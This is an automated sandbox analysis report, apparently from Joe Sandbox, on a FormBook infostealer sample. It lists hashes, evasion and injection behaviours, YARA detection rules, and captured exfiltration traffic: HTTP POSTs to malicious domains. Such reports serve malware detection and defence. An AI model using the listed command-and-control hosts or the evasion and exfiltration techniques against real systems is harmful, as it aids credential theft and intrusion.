Play interactive tourEdit tour

# Analysis Report R6o4qCis6s.exe

## Overview

### General Information

 Sample Name: R6o4qCis6s.exe Analysis ID: 287799 MD5: 79f04bd1fc5f9757f7979bb8cbefdd5e SHA1: e34056989f520736af44df68d869b71a4d4d695f SHA256: 8aafecddd3b462d27c24000757496edb5c6bce1e6abff9157d5360457b0805d7 Tags: exe Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w10x64R6o4qCis6s.exe (PID: 6652 cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)R6o4qCis6s.exe (PID: 6680 cmdline: 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: 79F04BD1FC5F9757F7979BB8CBEFDD5E)explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)explorer.exe (PID: 7040 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)cmd.exe (PID: 368 cmdline: /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)cleanup

## Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18349:\$sqlite3step: 68 34 1C 7B E1
• 0x1845c:\$sqlite3step: 68 34 1C 7B E1
• 0x18378:\$sqlite3text: 68 38 2A 90 C5
• 0x1849d:\$sqlite3text: 68 38 2A 90 C5
• 0x1838b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184b3:\$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 22 entries
SourceRuleDescriptionAuthorStrings
0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98d8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa55a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb253:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b267:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.R6o4qCis6s.exe.41b0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18349:\$sqlite3step: 68 34 1C 7B E1
• 0x1845c:\$sqlite3step: 68 34 1C 7B E1
• 0x18378:\$sqlite3text: 68 38 2A 90 C5
• 0x1849d:\$sqlite3text: 68 38 2A 90 C5
• 0x1838b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184b3:\$sqlite3blob: 68 53 D8 7F 8C
0.2.R6o4qCis6s.exe.4170000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
0.2.R6o4qCis6s.exe.4170000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8ad8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d42:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14875:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14361:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14977:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14aef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x975a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x135dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa453:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a467:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b46a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 19 entries

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

 Antivirus / Scanner detection for submitted sample Show sources
 Source: R6o4qCis6s.exe Avira: detected
 Antivirus detection for URL or domain Show sources
 Source: http://www.heyidianzib.com/tln/ Avira URL Cloud: Label: malware Source: http://www.heyidianzib.com Avira URL Cloud: Label: malware Source: http://www.heyidianzib.com/tln/www.olisolution.com Avira URL Cloud: Label: malware
 Multi AV Scanner detection for domain / URL Show sources
 Source: www.glowtey.com Virustotal: Detection: 7% Perma Link Source: http://www.glowtey.com/tln/ Virustotal: Detection: 8% Perma Link Source: http://www.glowtey.com Virustotal: Detection: 7% Perma Link
 Multi AV Scanner detection for submitted file Show sources
 Source: R6o4qCis6s.exe Virustotal: Detection: 77% Perma Link Source: R6o4qCis6s.exe ReversingLabs: Detection: 79%
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
 Machine Learning detection for sample Show sources
 Source: R6o4qCis6s.exe Joe Sandbox ML: detected
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 1.1.R6o4qCis6s.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 1.2.R6o4qCis6s.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
 Contains functionality to enumerate / list files inside a directory Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49734
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q). Source: global traffic HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 163864Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 72 44 2d 34 7a 28 5f 74 73 45 4c 48 35 6c 71 67 54 66 31 76 6e 41 34 5a 39 4c 48 77 4b 31 44 61 47 44 77 7e 7a 4a 4b 79 56 39 77 71 36 4c 64 49 4c 74 67 47 63 73 51 7a 55 6a 66 6c 36 33 42 6b 63 47 48 72 4a 28 49 69 37 30 46 57 6f 73 38 45 42 65 31 52 57 31 34 73 4a 6f 51 4e 5a 4c 39 32 77 44 36 77 32 6c 54 6a 55 34 57 78 56 43 61 4e 52 78 5f 48 6d 57 4f 76 4e 6b 65 4b 58 50 50 71 69 62 4e 43 78 73 4b 57 66 73 56 62 78 37 33 7a 79 6e 5f 52 52 79 31 28 56 4e 51 36 49 6f 6d 49 79 73 65 61 2d 28 67 56 6a 71 64 32 78 72 30 6b 50 6f 53 6f 34 51 67 7e 61 7e 51 57 6d 6c 34 54 5f 7a 55 68 41 6f 4c 79 48 72 44 55 4a 49 34 49 49 6a 4e 73 6b 6d 4b 48 64 49 4c 77 2d 6f 39 77 46 5a 72 46 61 31 55 54 75 61 78 71 36 70 79 6d 6a 61 35 37 53 63 72 68 4c 4d 36 35 76 67 30 44 55 64 30 6d 2d 34 58 44 6d 61 59 31 53 46 33 36 7a 42 32 61 45 73 45 4f 77 45 4b 46 70 71 75 59 63 7e 4a 70 31 46 5a 67 77 4c 74 31 4a 79 67 63 63 45 74 6c 4d 64 70 44 58 50 73 30 31 28 48 59 70 70 71 49 36 61 54 76 6e 4c 4b 50 5f 48 2d 32 6a 49 71 39 6e 66 55 54 73 30 45 63 44 6e 37 44 61 70 71 76 39 71 32 45 39 55 51 59 35 62 32 67 6d 5a 4b 6a 50 56 67 55 50 7e 41 48 6a 67 74 4f 58 41 77 36 41 30 42 66 53 74 65 33 79 39 67 72 6d 53 36 5a 6f 58 48 79 67 30 58 73 64 56 62 78 66 63 6b 51 2d 44 78 75 72 4e 30 4f 79 64 63 43 5f 28 4c 77 55 4d 76 35 35 74 58 28 74 4e 67 55 4d 76 59 68 63 51 6d 7a 4c 57 2d 59 76 6b 4e 72 65 61 4a 49 47 57 48 44 53 58 33 35 2d 46 30 76 74 51 67 42 44 35 4d 4e 4f 77 47 49 79 73 78 53 41 45 73 79 32 7a 39 48 6b 73 4d 34 69 6b 77 7a 70 34 32 32 72 70 61 78 70 33 33 35 70 50 6e 53 70 75 34 6b 59 7e 64 4c 62 74 65 47 73 5a 45 33 49 28 51 54 30 55 4e 4b 66 62 4b 46 48 77 71 36 68 54 6e 48 32 49 6c 4f 6c 50 75 43 72 43 62 48 65 73 67 33 32 7e 74 49 50 54 38 79 53 44 63 52 47 68 55 57 6a 51 76 6e 45 47 61 47 35 50 38 4e 62 42 48 6d 67 52 4c 7a 66 6d 2d 50 44 46 64 62 61 33 6c 7a 4a 6e 4f 43 39 61 48 6f 74 73 49 5a 55 65 31 7a 34 4f 70 37 4c 78 52 63 41 48 4a 45 31 6f 7a 45 39 5a 31 48 72 5a 56 6f 5a 4f 4b 6d 51 59 69 7e 36 31 68 78 5a 67 63 50 4e 4f 42 4b 6d 76 79 73 7a 66 77 43 35 43 79 6f 43 69 73 41 2d 77 57 6d 68 54 49 6a 77 5a 32 49 37 7e 57 43 77 70 51 33 67 68 63 46 49 39 4c 41 5a 56 30 62 61 74 49 48 47 74 64 30 6a 57 6c 5a 66 39 4a 73 43 4d 62 46 46 44 6f 55 67 6b 74 7a 48 6e 4a 42 41 41 6b 44 41 72 59 64 34 57 4d 4c 70 50 67 6a 74 5a 53 39 72 4e 6d 49 58 35 64 56 5a 76 74 55 70 72 58 4e 68 34 51 72 5f 30 4e 72 36 64 55 48 68 65 4a 28 2d 39 6c 74 59 72 6d 77 75 52 38 6f 70 33 56 45 53 75 43 70 2d 30 75 38 66 50 36 47 6a 66 4
 Source: global traffic HTTP traffic detected: GET /tln/?TTF=D8Oxqr&jfIlkD=Gih6PLZ1iCkKV6XaU73/B7cCcaHYH4uOLwbm5LWBOFF6YtYGomD/H0QVY53aBPOxn4Dm HTTP/1.1Host: www.cashflowtoday.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /tln/?jfIlkD=aheimOvVxRHS9+ZkV/8M4zSPjXUKcvGCrPlEERzYyjhu9GlhsqSRacAATphOmA3mqti9&TTF=D8Oxqr HTTP/1.1Host: www.themayoparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.cashflowtoday.net
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /tln/ HTTP/1.1Host: www.themayoparty.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.themayoparty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.themayoparty.com/tln/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6a 66 49 6c 6b 44 3d 53 44 53 59 34 70 6a 41 33 6a 36 6e 38 70 55 4b 56 5a 31 79 6b 58 61 72 72 6e 38 72 62 76 4b 2d 76 4b 59 47 61 43 48 30 7a 57 56 55 34 55 74 77 39 76 6e 57 63 37 74 6e 43 73 73 52 6b 45 6e 4a 6d 74 4c 4a 6b 64 79 35 72 4a 33 4c 73 6f 39 50 58 34 73 6e 46 67 69 4a 56 6d 4a 6f 73 4c 73 31 4e 36 6e 31 6a 41 48 36 30 47 74 52 6d 46 6f 6b 32 51 75 66 52 53 46 32 42 6b 57 58 76 5f 67 4d 4c 33 57 67 74 67 28 4c 50 6a 77 52 5a 38 30 70 63 69 71 33 70 32 50 34 65 32 62 78 68 43 64 55 32 70 6f 59 48 54 73 5a 5a 4f 6e 70 66 42 7a 67 39 67 76 4a 6e 66 35 68 6f 35 49 65 71 34 72 4f 53 6e 35 77 55 4f 76 79 71 52 38 61 7e 55 76 62 51 4c 67 46 45 74 72 69 6c 41 72 50 4e 74 74 52 38 63 68 34 7a 6e 6f 56 4b 50 46 59 62 37 7e 5a 73 70 6c 71 37 7a 47 5f 33 78 38 6e 76 34 46 33 7e 73 4e 62 62 55 64 66 67 2d 34 44 4c 32 61 4f 6e 69 77 31 36 43 78 66 61 43 73 6f 42 30 30 48 49 4b 65 75 57 5a 61 79 76 46 56 56 6f 67 37 52 69 65 53 70 50 75 5a 52 69 4d 64 78 44 56 33 64 30 31 28 6c 59 6f 70 4d 4a 50 79 54 76 33 71 55 49 59 72 79 28 44 49 6e 34 32 76 57 49 72 39 50 63 44 28 37 43 76 46 51 76 4f 36 32 41 6f 51 58 59 59 62 32 6a 57 5a 4b 6f 76 55 46 63 73 76 74 4b 44 74 6b 65 55 35 46 33 31 6c 33 51 44 38 77 31 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jfIlkD=SDSY4pjA3j6n8pUKVZ1ykXarrn8rbvK-vKYGaCH0zWVU4Utw9vnWc7tnCssRkEnJmtLJkdy5rJ3Lso9PX4snFgiJVmJosLs1N6n1jAH60GtRmFok2QufRSF2BkWXv_gML3Wgtg(LPjwRZ80pciq3p2P4e2bxhCdU2poYHTsZZOnpfBzg9gvJnf5ho5Ieq4rOSn5wUOvyqR8a~UvbQLgFEtrilArPNttR8ch4znoVKPFYb7~Zsplq7zG_3x8nv4F3~sNbbUdfg-4DL2aOniw16CxfaCsoB00HIKeuWZayvFVVog7RieSpPuZRiMdxDV3d01(lYopMJPyTv3qUIYry(DIn42vWIr9PcD(7CvFQvO62AoQXYYb2jWZKovUFcsvtKDtkeU5F31l3QD8w1Q).
 Urls found in memory or binary data Show sources
 Contains functionality to read the clipboard data Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
 Contains functionality to retrieve information about pressed keystrokes Show sources
 Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043A784 GetKeyboardState,

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 